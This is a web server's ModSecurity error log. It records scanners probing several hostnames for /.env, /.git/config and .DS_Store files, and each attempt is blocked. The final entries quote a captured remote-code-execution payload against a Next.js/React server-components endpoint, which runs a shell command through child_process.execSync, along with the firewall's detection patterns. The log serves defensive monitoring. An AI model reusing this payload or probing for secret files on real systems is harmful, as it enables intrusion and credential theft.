[Sun Dec 14 01:33:03.758227 2025] [:error] [pid 723484] [client 209.97.180.8:60644] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aT4Fvyx-Hk6S6vUC4v9xxgAAACg"]
[Sun Dec 14 01:33:03.758499 2025] [:error] [pid 723484] [client 209.97.180.8:60644] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aT4Fvyx-Hk6S6vUC4v9xxgAAACg"]
[Sun Dec 14 01:33:03.758691 2025] [:error] [pid 723484] [client 209.97.180.8:60644] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aT4Fvyx-Hk6S6vUC4v9xxgAAACg"]
[Sun Dec 14 01:33:05.754711 2025] [:error] [pid 723483] [client 209.97.180.8:60648] [client 209.97.180.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT4FwbUv02QNtGhXezJm-wAAACI"]
[Sun Dec 14 01:33:05.754945 2025] [:error] [pid 723483] [client 209.97.180.8:60648] [client 209.97.180.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT4FwbUv02QNtGhXezJm-wAAACI"]
[Sun Dec 14 01:33:05.755110 2025] [:error] [pid 723483] [client 209.97.180.8:60648] [client 209.97.180.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT4FwbUv02QNtGhXezJm-wAAACI"]
[Sun Dec 14 02:20:59.059004 2025] [authz_core:error] [pid 724216] [client 157.245.113.227:41854] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Dec 14 02:21:02.065762 2025] [:error] [pid 723526] [client 157.245.113.227:41884] [client 157.245.113.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4Q_vOIrdV847ZzOAZDUgAAAAA"]
[Sun Dec 14 02:21:02.066050 2025] [:error] [pid 723526] [client 157.245.113.227:41884] [client 157.245.113.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4Q_vOIrdV847ZzOAZDUgAAAAA"]
[Sun Dec 14 02:21:02.066246 2025] [:error] [pid 723526] [client 157.245.113.227:41884] [client 157.245.113.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4Q_vOIrdV847ZzOAZDUgAAAAA"]
[Sun Dec 14 02:21:03.116606 2025] [:error] [pid 723485] [client 157.245.113.227:41900] [client 157.245.113.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4Q_4EbRWlcA50EW0jZuwAAACk"]
[Sun Dec 14 02:21:03.116850 2025] [:error] [pid 723485] [client 157.245.113.227:41900] [client 157.245.113.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4Q_4EbRWlcA50EW0jZuwAAACk"]
[Sun Dec 14 02:21:03.117052 2025] [:error] [pid 723485] [client 157.245.113.227:41900] [client 157.245.113.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4Q_4EbRWlcA50EW0jZuwAAACk"]
[Sun Dec 14 02:21:05.074459 2025] [:error] [pid 723483] [client 157.245.113.227:41912] [client 157.245.113.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4RAbUv02QNtGhXezJnBgAAACI"]
[Sun Dec 14 02:21:05.074696 2025] [:error] [pid 723483] [client 157.245.113.227:41912] [client 157.245.113.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4RAbUv02QNtGhXezJnBgAAACI"]
[Sun Dec 14 02:21:05.074860 2025] [:error] [pid 723483] [client 157.245.113.227:41912] [client 157.245.113.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4RAbUv02QNtGhXezJnBgAAACI"]
[Sun Dec 14 03:02:04.898321 2025] [authz_core:error] [pid 725946] [client 206.189.19.19:50236] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Dec 14 03:02:07.899535 2025] [:error] [pid 725943] [client 206.189.19.19:50258] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4anz2m5DlzYKppswchQgAAAAE"]
[Sun Dec 14 03:02:07.899899 2025] [:error] [pid 725943] [client 206.189.19.19:50258] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4anz2m5DlzYKppswchQgAAAAE"]
[Sun Dec 14 03:02:07.900132 2025] [:error] [pid 725943] [client 206.189.19.19:50258] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4anz2m5DlzYKppswchQgAAAAE"]
[Sun Dec 14 03:02:08.904753 2025] [:error] [pid 725946] [client 206.189.19.19:44496] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4aoKnSE5_lC1C3wshu2AAAAAQ"]
[Sun Dec 14 03:02:08.904998 2025] [:error] [pid 725946] [client 206.189.19.19:44496] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4aoKnSE5_lC1C3wshu2AAAAAQ"]
[Sun Dec 14 03:02:08.905165 2025] [:error] [pid 725946] [client 206.189.19.19:44496] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4aoKnSE5_lC1C3wshu2AAAAAQ"]
[Sun Dec 14 03:02:10.903587 2025] [:error] [pid 725962] [client 206.189.19.19:44502] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4aonmE4vWx48cpXwLbgAAAAAY"]
[Sun Dec 14 03:02:10.903855 2025] [:error] [pid 725962] [client 206.189.19.19:44502] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4aonmE4vWx48cpXwLbgAAAAAY"]
[Sun Dec 14 03:02:10.904043 2025] [:error] [pid 725962] [client 206.189.19.19:44502] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4aonmE4vWx48cpXwLbgAAAAAY"]
[Sun Dec 14 03:26:12.248061 2025] [authz_core:error] [pid 725962] [client 167.99.182.39:49884] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Dec 14 03:26:15.252009 2025] [:error] [pid 725942] [client 167.99.182.39:49904] [client 167.99.182.39] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aT4gRw3mjH66LQSFy_-D4AAAAAA"]
[Sun Dec 14 03:26:15.252263 2025] [:error] [pid 725942] [client 167.99.182.39:49904] [client 167.99.182.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aT4gRw3mjH66LQSFy_-D4AAAAAA"]
[Sun Dec 14 03:26:15.252443 2025] [:error] [pid 725942] [client 167.99.182.39:49904] [client 167.99.182.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aT4gRw3mjH66LQSFy_-D4AAAAAA"]
[Sun Dec 14 03:26:16.269488 2025] [:error] [pid 725946] [client 167.99.182.39:47906] [client 167.99.182.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aT4gSKnSE5_lC1C3wshu4wAAAAQ"]
[Sun Dec 14 03:26:16.269728 2025] [:error] [pid 725946] [client 167.99.182.39:47906] [client 167.99.182.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aT4gSKnSE5_lC1C3wshu4wAAAAQ"]
[Sun Dec 14 03:26:16.269892 2025] [:error] [pid 725946] [client 167.99.182.39:47906] [client 167.99.182.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aT4gSKnSE5_lC1C3wshu4wAAAAQ"]
[Sun Dec 14 03:26:18.251219 2025] [:error] [pid 725970] [client 167.99.182.39:47916] [client 167.99.182.39] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT4gSkUErFn9xBIdCzkB9wAAAAc"]
[Sun Dec 14 03:26:18.251467 2025] [:error] [pid 725970] [client 167.99.182.39:47916] [client 167.99.182.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT4gSkUErFn9xBIdCzkB9wAAAAc"]
[Sun Dec 14 03:26:18.252103 2025] [:error] [pid 725970] [client 167.99.182.39:47916] [client 167.99.182.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aT4gSkUErFn9xBIdCzkB9wAAAAc"]
[Sun Dec 14 20:06:32.881715 2025] [:error] [pid 740192] [client 45.153.34.216:55612] [client 45.153.34.216] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT8KuEAm06IYTYly23IfngAAAAk"]
[Sun Dec 14 20:06:32.882081 2025] [:error] [pid 740192] [client 45.153.34.216:55612] [client 45.153.34.216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT8KuEAm06IYTYly23IfngAAAAk"]
[Sun Dec 14 20:06:32.882267 2025] [:error] [pid 740192] [client 45.153.34.216:55612] [client 45.153.34.216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT8KuEAm06IYTYly23IfngAAAAk"]
[Sun Dec 14 20:08:22.729276 2025] [:error] [pid 725946] [client 3.106.229.28:37934] [client 3.106.229.28] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJqnSE5_lC1C3wshwyAAAAAQ"]
[Sun Dec 14 20:08:22.729750 2025] [:error] [pid 725946] [client 3.106.229.28:37934] [client 3.106.229.28] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aT8LJqnSE5_lC1C3wshwyAAAAAQ"]
